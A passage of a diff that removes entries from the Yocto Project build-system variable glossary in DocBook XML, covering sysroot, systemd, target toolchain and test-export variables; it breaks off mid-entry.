-     SYSLINUX_SERIAL_TTY ?= "console=ttyS0,115200"
-                    </literallayout>
-                </para>
-
-                <para>
-                    The class checks for and uses the variable as needed.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SYSROOT_DESTDIR'><glossterm>SYSROOT_DESTDIR</glossterm>
-            <info>
-                SYSROOT_DESTDIR[doc] = "Points to the temporary work directory (default ${WORKDIR}/sysroot-destdir) where the files populated into the sysroot are assembled during the do_populate_sysroot task."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Points to the temporary directory under the work directory
-                    (default
-                    "<filename>${</filename><link linkend='var-WORKDIR'><filename>WORKDIR</filename></link><filename>}/sysroot-destdir</filename>")
-                    where the files populated into the sysroot are assembled
-                    during the
-                    <link linkend='ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></link>
-                    task.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SYSROOT_DIRS'><glossterm>SYSROOT_DIRS</glossterm>
-            <info>
-                SYSROOT_DIRS[doc] = "Directories that are staged into the sysroot by the do_populate_sysroot task."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Directories that are staged into the sysroot by the
-                    <link linkend='ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></link>
-                    task.
-                    By default, the following directories are staged:
-                    <literallayout class='monospaced'>
-     SYSROOT_DIRS = " \
-         ${includedir} \
-         ${libdir} \
-         ${base_libdir} \
-         ${nonarch_base_libdir} \
-         ${datadir} \
-     "
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SYSROOT_DIRS_BLACKLIST'><glossterm>SYSROOT_DIRS_BLACKLIST</glossterm>
-            <info>
-                SYSROOT_DIRS_BLACKLIST[doc] = "Directories that are not staged into the sysroot by the do_populate_sysroot task."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Directories that are not staged into the sysroot by the
-                    <link linkend='ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></link>
-                    task.
-                    You can use this variable to exclude certain subdirectories
-                    of directories listed in
-                    <link linkend='var-SYSROOT_DIRS'><filename>SYSROOT_DIRS</filename></link>
-                    from staging.
-                    By default, the following directories are not staged:
-                    <literallayout class='monospaced'>
-     SYSROOT_DIRS_BLACKLIST = " \
-         ${mandir} \
-         ${docdir} \
-         ${infodir} \
-         ${datadir}/locale \
-         ${datadir}/applications \
-         ${datadir}/fonts \
-         ${datadir}/pixmaps \
-     "
-                     </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SYSROOT_DIRS_NATIVE'><glossterm>SYSROOT_DIRS_NATIVE</glossterm>
-            <info>
-                SYSROOT_DIRS_NATIVE[doc] = "Extra directories staged into the sysroot by the do_populate_sysroot task for -native recipes, in addition to those specified in SYSROOT_DIRS."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Extra directories staged into the sysroot by the
-                    <link linkend='ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></link>
-                    task for <filename>-native</filename> recipes, in addition
-                    to those specified in
-                    <link linkend='var-SYSROOT_DIRS'><filename>SYSROOT_DIRS</filename></link>.
-                    By default, the following extra directories are staged:
-                    <literallayout class='monospaced'>
-     SYSROOT_DIRS_NATIVE = " \
-         ${bindir} \
-         ${sbindir} \
-         ${base_bindir} \
-         ${base_sbindir} \
-         ${libexecdir} \
-         ${sysconfdir} \
-         ${localstatedir} \
-     "
-                    </literallayout>
-                    <note>
-                        Programs built by <filename>-native</filename> recipes
-                        run directly from the sysroot
-                        (<link linkend='var-STAGING_DIR_NATIVE'><filename>STAGING_DIR_NATIVE</filename></link>),
-                        which is why additional directories containing program
-                        executables and supporting files need to be staged.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SYSROOT_PREPROCESS_FUNCS'><glossterm>SYSROOT_PREPROCESS_FUNCS</glossterm>
-            <info>
-                SYSROOT_PREPROCESS_FUNCS[doc] = "A list of functions to execute after files are staged into the sysroot. These functions are usually used to apply additional processing on the staged files, or to stage additional files."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of functions to execute after files are staged into
-                    the sysroot.
-                    These functions are usually used to apply additional
-                    processing on the staged files, or to stage additional
-                    files.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SYSTEMD_AUTO_ENABLE'><glossterm>SYSTEMD_AUTO_ENABLE</glossterm>
-            <info>
-                SYSTEMD_AUTO_ENABLE[doc] = "For recipes that inherit the systemd class, this variable specifies whether the specified service in SYSTEMD_SERVICE should start automatically or not."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-systemd'><filename>systemd</filename></link>
-                    class, this variable specifies whether the specified service
-                    in
-                    <link linkend='var-SYSTEMD_SERVICE'><filename>SYSTEMD_SERVICE</filename></link>
-                    should start automatically or not.
-                    By default, the service is enabled to automatically start
-                    at boot time.
-                    The default setting is in the
-                    <link linkend='ref-classes-systemd'><filename>systemd</filename></link>
-                    class as follows:
-                    <literallayout class='monospaced'>
-     SYSTEMD_AUTO_ENABLE ??= "enable"
-                    </literallayout>
-                </para>
-
-                <para>
-                    You can disable the service by setting the variable to
-                    "disable".
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SYSTEMD_BOOT_CFG'><glossterm>SYSTEMD_BOOT_CFG</glossterm>
-            <info>
-                SYSTEMD_BOOT_CFG[doc] = "When EFI_PROVIDER is set to "systemd-boot", the SYSTEMD_BOOT_CFG variable specifies the configuration file that should be used."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When
-                    <link linkend='var-EFI_PROVIDER'><filename>EFI_PROVIDER</filename></link>
-                    is set to "systemd-boot", the
-                    <filename>SYSTEMD_BOOT_CFG</filename> variable specifies the
-                    configuration file that should be used.
-                    By default, the
-                    <link linkend='ref-classes-systemd-boot'><filename>systemd-boot</filename></link>
-                    class sets the <filename>SYSTEMD_BOOT_CFG</filename> as
-                    follows:
-                    <literallayout class='monospaced'>
-     SYSTEMD_BOOT_CFG ?= "${<link linkend='var-S'>S</link>}/loader.conf"
-                    </literallayout>
-                </para>
-
-                <para>
-                    For information on Systemd-boot, see the
-                    <ulink url='http://www.freedesktop.org/wiki/Software/systemd/systemd-boot/'>Systemd-boot documentation</ulink>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SYSTEMD_BOOT_ENTRIES'><glossterm>SYSTEMD_BOOT_ENTRIES</glossterm>
-            <info>
-                SYSTEMD_BOOT_ENTRIES[doc] = "When EFI_PROVIDER is set to "systemd-boot", the SYSTEMD_BOOT_ENTRIES variable specifies a list of entry files (*.conf) to install that contain one boot entry per file."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When
-                    <link linkend='var-EFI_PROVIDER'><filename>EFI_PROVIDER</filename></link>
-                    is set to "systemd-boot", the
-                    <filename>SYSTEMD_BOOT_ENTRIES</filename> variable specifies
-                    a list of entry files
-                    (<filename>*.conf</filename>) to install that contain
-                    one boot entry per file.
-                    By default, the
-                    <link linkend='ref-classes-systemd-boot'><filename>systemd-boot</filename></link>
-                    class sets the <filename>SYSTEMD_BOOT_ENTRIES</filename> as
-                    follows:
-                    <literallayout class='monospaced'>
-     SYSTEMD_BOOT_ENTRIES ?= ""
-                    </literallayout>
-                </para>
-
-                <para>
-                    For information on Systemd-boot, see the
-                    <ulink url='http://www.freedesktop.org/wiki/Software/systemd/systemd-boot/'>Systemd-boot documentation</ulink>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SYSTEMD_BOOT_TIMEOUT'><glossterm>SYSTEMD_BOOT_TIMEOUT</glossterm>
-            <info>
-                SYSTEMD_BOOT_TIMEOUT[doc] = "When EFI_PROVIDER is set to "systemd-boot", the SYSTEMD_BOOT_TIMEOUT variable specifies the boot menu timeout in seconds."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When
-                    <link linkend='var-EFI_PROVIDER'><filename>EFI_PROVIDER</filename></link>
-                    is set to "systemd-boot", the
-                    <filename>SYSTEMD_BOOT_TIMEOUT</filename> variable specifies
-                    the boot menu timeout in seconds.
-                    By default, the
-                    <link linkend='ref-classes-systemd-boot'><filename>systemd-boot</filename></link>
-                    class sets the <filename>SYSTEMD_BOOT_TIMEOUT</filename> as
-                    follows:
-                    <literallayout class='monospaced'>
-     SYSTEMD_BOOT_TIMEOUT ?= "10"
-                    </literallayout>
-                </para>
-
-                <para>
-                    For information on Systemd-boot, see the
-                    <ulink url='http://www.freedesktop.org/wiki/Software/systemd/systemd-boot/'>Systemd-boot documentation</ulink>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SYSTEMD_PACKAGES'><glossterm>SYSTEMD_PACKAGES</glossterm>
-            <info>
-                SYSTEMD_PACKAGES[doc] = "For recipes that inherit the systemd class, this variable locates the systemd unit files when they are not found in the main recipe's package."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-systemd'><filename>systemd</filename></link>
-                    class, this variable locates the systemd unit files when
-                    they are not found in the main recipe's package.
-                    By default, the
-                    <filename>SYSTEMD_PACKAGES</filename> variable is set
-                    such that the systemd unit files are assumed to reside in
-                    the recipes main package:
-                    <literallayout class='monospaced'>
-     SYSTEMD_PACKAGES ?= "${PN}"
-                    </literallayout>
-                </para>
-
-                <para>
-                    If these unit files are not in this recipe's main
-                    package, you need to use
-                    <filename>SYSTEMD_PACKAGES</filename> to list the package
-                    or packages in which the build system can find the systemd
-                    unit files.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SYSTEMD_SERVICE'><glossterm>SYSTEMD_SERVICE</glossterm>
-            <info>
-                SYSTEMD_SERVICE[doc] = "For recipes that inherit the systemd class, this variable specifies the systemd service name for a package."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-systemd'><filename>systemd</filename></link>
-                    class, this variable specifies the systemd service name for
-                    a package.
-                </para>
-
-                <para>
-                    When you specify this file in your recipe, use a package
-                    name override to indicate the package to which the value
-                    applies.
-                    Here is an example from the connman recipe:
-                    <literallayout class='monospaced'>
-     SYSTEMD_SERVICE_${PN} = "connman.service"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SYSVINIT_ENABLED_GETTYS'><glossterm>SYSVINIT_ENABLED_GETTYS</glossterm>
-            <info>
-                SYSVINIT_ENABLED_GETTYS[doc] = "Specifies which virtual terminals should run a getty, the default is '1'."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When using
-                    <ulink url='&YOCTO_DOCS_DEV_URL;#new-recipe-enabling-system-services'>SysVinit</ulink>,
-                    specifies a space-separated list of the virtual terminals
-                    that should run a
-                    <ulink url='http://en.wikipedia.org/wiki/Getty_%28Unix%29'>getty</ulink>
-                    (allowing login), assuming
-                    <link linkend='var-USE_VT'><filename>USE_VT</filename></link>
-                    is not set to "0".
-                </para>
-
-                <para>
-                    The default value for
-                    <filename>SYSVINIT_ENABLED_GETTYS</filename> is "1"
-                    (i.e. only run a getty on the first virtual terminal).
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-glossary-t'><title>T</title>
-
-        <glossentry id='var-T'><glossterm>T</glossterm>
-            <info>
-                T[doc] = "This variable points to a directory were BitBake places temporary files, which consist mostly of task logs and scripts, when building a particular recipe."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    This variable points to a directory were BitBake places
-                    temporary files, which consist mostly of task logs and
-                    scripts, when building a particular recipe.
-                    The variable is typically set as follows:
-                    <literallayout class='monospaced'>
-     T = "${WORKDIR}/temp"
-                    </literallayout>
-                </para>
-
-                <para>
-                    The <link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>
-                    is the directory into which BitBake unpacks and builds the
-                    recipe.
-                    The default <filename>bitbake.conf</filename> file sets this variable.</para>
-                    <para>The <filename>T</filename> variable is not to be confused with
-                    the <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link> variable,
-                    which points to the root of the directory tree where BitBake
-                    places the output of an entire build.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TARGET_ARCH'><glossterm>TARGET_ARCH</glossterm>
-            <info>
-                TARGET_ARCH[doc] = "The architecture of the device being built. The OpenEmbedded build system supports the following architectures: arm, mips, ppc, x86, x86-64."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The target machine's architecture.
-                    The OpenEmbedded build system supports many
-                    architectures.
-                    Here is an example list of architectures supported.
-                    This list is by no means complete as the architecture
-                    is configurable:
-                    <literallayout class='monospaced'>
-     arm
-     i586
-     x86_64
-     powerpc
-     powerpc64
-     mips
-     mipsel
-                    </literallayout>
-                </para>
-
-                <para>
-                    For additional information on machine architectures, see
-                    the
-                    <link linkend='var-TUNE_ARCH'><filename>TUNE_ARCH</filename></link>
-                    variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TARGET_AS_ARCH'><glossterm>TARGET_AS_ARCH</glossterm>
-            <info>
-                TARGET_AS_ARCH[doc] = "Specifies architecture-specific assembler flags for the target system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies architecture-specific assembler flags for the
-                    target system.
-                    <filename>TARGET_AS_ARCH</filename> is initialized from
-                    <link linkend='var-TUNE_ASARGS'><filename>TUNE_ASARGS</filename></link>
-                    by default in the BitBake configuration file
-                    (<filename>meta/conf/bitbake.conf</filename>):
-                    <literallayout class='monospaced'>
-     TARGET_AS_ARCH = "${TUNE_ASARGS}"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TARGET_CC_ARCH'><glossterm>TARGET_CC_ARCH</glossterm>
-            <info>
-                TARGET_CC_ARCH[doc] = "Specifies architecture-specific C compiler flags for the target system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies architecture-specific C compiler flags for the
-                    target system.
-                    <filename>TARGET_CC_ARCH</filename> is initialized from
-                    <link linkend='var-TUNE_CCARGS'><filename>TUNE_CCARGS</filename></link>
-                    by default.
-                    <note>
-                        It is a common workaround to append
-                        <link linkend='var-LDFLAGS'><filename>LDFLAGS</filename></link>
-                        to <filename>TARGET_CC_ARCH</filename>
-                        in recipes that build software for the target that
-                        would not otherwise respect the exported
-                        <filename>LDFLAGS</filename> variable.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TARGET_CC_KERNEL_ARCH'><glossterm>TARGET_CC_KERNEL_ARCH</glossterm>
-            <info>
-                TARGET_CC_KERNEL_ARCH[doc] = "This is a specific kernel compiler flag for a CPU or Application Binary Interface (ABI) tune."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    This is a specific kernel compiler flag for a CPU or
-                    Application Binary Interface (ABI) tune.
-                    The flag is used rarely and only for cases where a
-                    userspace
-                    <link linkend='var-TUNE_CCARGS'><filename>TUNE_CCARGS</filename></link>
-                    is not compatible with the kernel compilation.
-                    The <filename>TARGET_CC_KERNEL_ARCH</filename> variable
-                    allows the kernel (and associated modules) to use a
-                    different configuration.
-                    See the
-                    <filename>meta/conf/machine/include/arm/feature-arm-thumb.inc</filename>
-                    file in the
-                    <link linkend='source-directory'>Source Directory</link>
-                    for an example.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TARGET_CFLAGS'><glossterm>TARGET_CFLAGS</glossterm>
-            <info>
-                TARGET_CFLAGS[doc] = "Flags passed to the C compiler for the target system. This variable evaluates to the same as CFLAGS."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the flags to pass to the C compiler when building
-                    for the target.
-                    When building in the target context,
-                    <link linkend='var-CFLAGS'><filename>CFLAGS</filename></link>
-                    is set to the value of this variable by default.
-                </para>
-
-                <para>
-                    Additionally, the SDK's environment setup script sets
-                    the <filename>CFLAGS</filename> variable in the environment
-                    to the <filename>TARGET_CFLAGS</filename> value so that
-                    executables built using the SDK also have the flags
-                    applied.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TARGET_CPPFLAGS'><glossterm>TARGET_CPPFLAGS</glossterm>
-            <info>
-                TARGET_CPPFLAGS[doc] = "Specifies the flags to pass to the C pre-processor (i.e. to both the C and the C++ compilers) when building for the target."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the flags to pass to the C pre-processor
-                    (i.e. to both the C and the C++ compilers) when building
-                    for the target.
-                    When building in the target context,
-                    <link linkend='var-CPPFLAGS'><filename>CPPFLAGS</filename></link>
-                    is set to the value of this variable by default.
-                </para>
-
-                <para>
-                    Additionally, the SDK's environment setup script sets
-                    the <filename>CPPFLAGS</filename> variable in the
-                    environment to the <filename>TARGET_CPPFLAGS</filename>
-                    value so that executables built using the SDK also have
-                    the flags applied.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TARGET_CXXFLAGS'><glossterm>TARGET_CXXFLAGS</glossterm>
-            <info>
-                TARGET_CXXFLAGS[doc] = "Specifies the flags to pass to the C++ compiler when building for the target."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the flags to pass to the C++ compiler when
-                    building for the target.
-                    When building in the target context,
-                    <link linkend='var-CXXFLAGS'><filename>CXXFLAGS</filename></link>
-                    is set to the value of this variable by default.
-                </para>
-
-                <para>
-                    Additionally, the SDK's environment setup script sets
-                    the <filename>CXXFLAGS</filename> variable in the
-                    environment to the <filename>TARGET_CXXFLAGS</filename>
-                    value so that executables built using the SDK also have
-                    the flags applied.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TARGET_FPU'><glossterm>TARGET_FPU</glossterm>
-            <info>
-                TARGET_FPU[doc] = "Specifies the method for handling FPU code. For FPU-less targets, which include most ARM CPUs, the variable must be set to 'soft'. If not, the kernel emulation gets used, which results in a performance penalty."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the method for handling FPU code.
-                    For FPU-less targets, which include most ARM CPUs, the variable must be
-                    set to "soft".
-                    If not, the kernel emulation gets used, which results in a performance penalty.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TARGET_LD_ARCH'><glossterm>TARGET_LD_ARCH</glossterm>
-            <info>
-                TARGET_LD_ARCH[doc] = "Specifies architecture-specific linker flags for the target system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies architecture-specific linker flags for the
-                    target system.
-                    <filename>TARGET_LD_ARCH</filename> is initialized from
-                    <link linkend='var-TUNE_LDARGS'><filename>TUNE_LDARGS</filename></link>
-                    by default in the BitBake configuration file
-                    (<filename>meta/conf/bitbake.conf</filename>):
-                    <literallayout class='monospaced'>
-     TARGET_LD_ARCH = "${TUNE_LDARGS}"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TARGET_LDFLAGS'><glossterm>TARGET_LDFLAGS</glossterm>
-            <info>
-                TARGET_LDFLAGS[doc] = "Specifies the flags to pass to the linker when building for the target."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the flags to pass to the linker when building
-                    for the target.
-                    When building in the target context,
-                    <link linkend='var-LDFLAGS'><filename>LDFLAGS</filename></link>
-                    is set to the value of this variable by default.
-                </para>
-
-                <para>
-                    Additionally, the SDK's environment setup script sets
-                    the
-                    <link linkend='var-LDFLAGS'><filename>LDFLAGS</filename></link>
-                    variable in the environment to the
-                    <filename>TARGET_LDFLAGS</filename> value so that
-                    executables built using the SDK also have the flags
-                    applied.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TARGET_OS'><glossterm>TARGET_OS</glossterm>
-            <info>
-                TARGET_OS[doc] = "Specifies the target's operating system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the target's operating system.
-                    The variable can be set to "linux" for glibc-based systems
-                    (GNU C Library) and to "linux-musl" for musl libc.
-                    For ARM/EABI targets, "linux-gnueabi" and "linux-musleabi"
-                    possible values exist.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TARGET_PREFIX'><glossterm>TARGET_PREFIX</glossterm>
-            <info>
-                TARGET_PREFIX[doc] = "The prefix used for the toolchain binary target tools."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the prefix used for the toolchain binary target
-                    tools.
-                </para>
-
-                <para>
-                    Depending on the type of recipe and the build target,
-                    <filename>TARGET_PREFIX</filename> is set as follows:
-                    <itemizedlist>
-                        <listitem><para>
-                            For recipes building for the target machine,
-                            the value is
-                            "${<link linkend='var-TARGET_SYS'>TARGET_SYS</link>}-".
-                            </para></listitem>
-                        <listitem><para>
-                            For native recipes, the build system sets the
-                            variable to the value of
-                            <filename>BUILD_PREFIX</filename>.
-                            </para></listitem>
-                        <listitem><para>
-                            For native SDK recipes
-                            (<filename>nativesdk</filename>), the
-                            build system sets the variable to the value of
-                            <filename>SDK_PREFIX</filename>.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TARGET_SYS'><glossterm>TARGET_SYS</glossterm>
-            <info>
-                TARGET_SYS[doc] = "The target system is comprised of TARGET_ARCH,TARGET_VENDOR and TARGET_OS."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the system, including the architecture and the
-                    operating system, for which the build is occurring in
-                    the context of the current recipe.
-                </para>
-
-                <para>
-                    The OpenEmbedded build system automatically sets this
-                    variable based on
-                    <link linkend='var-TARGET_ARCH'><filename>TARGET_ARCH</filename></link>,
-                    <link linkend='var-TARGET_VENDOR'><filename>TARGET_VENDOR</filename></link>,
-                    and
-                    <link linkend='var-TARGET_OS'><filename>TARGET_OS</filename></link>
-                    variables.
-                    <note>
-                        You do not need to set the
-                        <filename>TARGET_SYS</filename> variable yourself.
-                    </note>
-                </para>
-
-                <para>
-                    Consider these two examples:
-                    <itemizedlist>
-                        <listitem><para>
-                            Given a native recipe on a 32-bit, x86 machine
-                            running Linux, the value is "i686-linux".
-                            </para></listitem>
-                        <listitem><para>
-                            Given a recipe being built for a little-endian,
-                            MIPS target running Linux, the value might be
-                            "mipsel-linux".
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TARGET_VENDOR'><glossterm>TARGET_VENDOR</glossterm>
-            <info>
-                TARGET_VENDOR[doc] = "The name of the target vendor."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the name of the target vendor.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TCLIBC'><glossterm>TCLIBC</glossterm>
-            <info>
-                TCLIBC[doc] = "Specifies GNU standard C library (libc) variant to use during the build process. You can select 'glibc', 'musl' or 'newlib'."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the GNU standard C library
-                    (<filename>libc</filename>) variant to use during the
-                    build process.
-                    This variable replaces <filename>POKYLIBC</filename>,
-                    which is no longer supported.
-                </para>
-
-                <para>
-                    You can select "glibc", "musl", "newlib", or "baremetal"
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TCLIBCAPPEND'><glossterm>TCLIBCAPPEND</glossterm>
-            <info>
-                TCLIBCAPPEND[doc] = "Specifies a suffix appended to TMPDIR that identifies the libc variant for the build."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a suffix to be appended onto the
-                    <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>
-                    value.
-                    The suffix identifies the <filename>libc</filename> variant
-                    for building.
-                    When you are building for multiple variants with the same
-                    <link linkend='build-directory'>Build Directory</link>,
-                    this mechanism ensures that output for different
-                    <filename>libc</filename> variants is kept separate to
-                    avoid potential conflicts.
-                </para>
-
-                <para>
-                    In the <filename>defaultsetup.conf</filename> file, the
-                    default value of <filename>TCLIBCAPPEND</filename> is
-                    "-${TCLIBC}".
-                    However, distros such as poky, which normally only support
-                    one <filename>libc</filename> variant, set
-                    <filename>TCLIBCAPPEND</filename> to "" in their distro
-                    configuration file resulting in no suffix being applied.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TCMODE'><glossterm>TCMODE</glossterm>
-            <info>
-                TCMODE[doc] = "Enables an external toolchain (where provided by an additional layer) if set to a value other than 'default'."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the toolchain selector.
-                    <filename>TCMODE</filename> controls the characteristics
-                    of the generated packages and images by telling the
-                    OpenEmbedded build system which toolchain profile to use.
-                    By default, the OpenEmbedded build system builds its own
-                    internal toolchain.
-                    The variable's default value is "default", which uses
-                    that internal toolchain.
-                    <note>
-                        If <filename>TCMODE</filename> is set to a value
-                        other than "default", then it is your responsibility
-                        to ensure that the toolchain is compatible with the
-                        default toolchain.
-                        Using older or newer versions of these components
-                        might cause build problems.
-                        See the Release Notes for the Yocto Project release
-                        for the specific components with which the toolchain
-                        must be compatible.
-                        To access the Release Notes, go to the
-                        <ulink url='&YOCTO_HOME_URL;/software-overview/downloads/'>Downloads</ulink>
-                        page on the Yocto Project website and click on the
-                        "RELEASE INFORMATION" link for the appropriate
-                        release.
-                    </note>
-                </para>
-
-                <para>
-                    The <filename>TCMODE</filename> variable is similar to
-                    <link linkend='var-TCLIBC'><filename>TCLIBC</filename></link>,
-                    which controls the variant of the GNU standard C library
-                    (<filename>libc</filename>) used during the build process:
-                    <filename>glibc</filename> or <filename>musl</filename>.
-                </para>
-
-                <para>
-                    With additional layers, it is possible to use a pre-compiled
-                    external toolchain.
-                    One example is the Sourcery G++ Toolchain.
-                    The support for this toolchain resides in the separate
-                    <trademark class='registered'>Mentor Graphics</trademark>
-                    <filename>meta-sourcery</filename> layer at
-                    <ulink url='http://github.com/MentorEmbedded/meta-sourcery/'></ulink>.
-                </para>
-
-                <para>
-                    The layer's <filename>README</filename> file contains
-                    information on how to use the Sourcery G++ Toolchain as
-                    an external toolchain.
-                    In summary, you must be sure to add the layer to your
-                    <filename>bblayers.conf</filename> file in front of the
-                    <filename>meta</filename> layer and then set the
-                    <filename>EXTERNAL_TOOLCHAIN</filename>
-                    variable in your <filename>local.conf</filename> file
-                    to the location in which you installed the toolchain.
-                </para>
-
-                <para>
-                    The fundamentals used for this example apply to any
-                    external toolchain.
-                    You can use <filename>meta-sourcery</filename> as a
-                    template for adding support for other external toolchains.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TEST_EXPORT_DIR'><glossterm>TEST_EXPORT_DIR</glossterm>
-            <info>
-                TEST_EXPORT_DIR[doc] = "The location the OpenEmbedded build system uses to export tests when the TEST_EXPORT_ONLY variable is set to "1"."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The location the OpenEmbedded build system uses to export
-                    tests when the
-                    <link linkend='var-TEST_EXPORT_ONLY'><filename>TEST_EXPORT_ONLY</filename></link>
-                    variable is set to "1".
-                </para>
-
-                <para>
-                    The <filename>TEST_EXPORT_DIR</filename> variable defaults
-                    to <filename>"${TMPDIR}/testimage/${PN}"</filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TEST_EXPORT_ONLY'><glossterm>TEST_EXPORT_ONLY</glossterm>
-            <info>
-                TEST_EXPORT_ONLY[doc] = "Specifies to export the tests only. Set this variable to "1" if you do not want to run the tests but you want them to be exported in a manner that you to run them outside of the build system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies to export the tests only.
-                    Set this variable to "1" if you do not want to run the
-                    tests but you want them to be exported in a manner that
-                    you to run them outside of the build system.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TEST_LOG_DIR'><glossterm>TEST_LOG_DIR</glossterm>
-            <info>
-                TEST_LOG_DIR[doc] = "Holds the SSH log and the boot log for QEMU machines. The TEST_LOG_DIR variable defaults to "${WORKDIR}/testimage"."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Holds the SSH log and the boot log for QEMU machines.
-                    The <filename>TEST_LOG_DIR</filename> variable defaults
-                    to <filename>"${WORKDIR}/testimage"</filename>.
-                    <note>
-                        Actual test results reside in the task log
-                        (<filename>log.do_testimage</filename>), which is in
-                        the <filename>${WORKDIR}/temp/</filename> directory.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TEST_POWERCONTROL_CMD'><glossterm>TEST_POWERCONTROL_CMD</glossterm>
-            <info>
-                TEST_POWERCONTROL_CMD[doc] = "For automated hardware testing, specifies the command to use to control the power of the target machine under test"
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    For automated hardware testing, specifies the command to
-                    use to control the power of the target machine under test.
-                    Typically, this command would point to a script that
-                    performs the appropriate action (e.g. interacting
-                    with a web-enabled power strip).
-                    The specified command should expect to receive as the last
-                    argument "off", "on" or "cycle" specifying to power off,
-                    on, or cycle (power off and then power on) the device,
-                    respectively.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TEST_POWERCONTROL_EXTRA_ARGS'><glossterm>TEST_POWERCONTROL_EXTRA_ARGS</glossterm>
-            <info>
-                TEST_POWERCONTROL_EXTRA_ARGS[doc] = "For automated hardware testing, specifies additional arguments to pass through to the command specified in TEST_POWERCONTROL_CMD"
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    For automated hardware testing, specifies additional
-                    arguments to pass through to the command specified in
